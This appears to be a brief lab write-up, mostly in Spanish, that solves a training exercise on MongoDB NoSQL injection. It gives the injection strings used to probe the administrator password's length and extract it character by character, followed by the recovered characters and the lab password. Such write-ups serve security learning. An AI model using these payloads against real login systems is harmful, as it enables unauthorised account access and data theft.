02 Lab: Exploiting NoSQL injection to extract data
Objetivo
The login functionality for this lab is powered by a MongoDB NoSQL database. It is vulnerable to NoSQL injection using MongoDB operators.
To solve the lab, log into the application as the
administratoruser.You can log in to your own account using the following credentials:
wiener:peter.
Solución
Cambiamos el parametro de usuario a administrator' && this.password.length < 30 || 'a'=='b,
administrator' && this.password[$0$]=='$a$
La contraseña es de 8 caracteres
5
c
2
q
3
q
7
d
1
f
6
z
0
n
4
v
User: administrator Password:nfqqvczd
Previous01 Lab Detecting NoSQL injection 17efab5460ec80e19ec7ee42c9d3a627Next04 Lab: Exploiting NoSQL operator injection to extract unknown fields
Last updated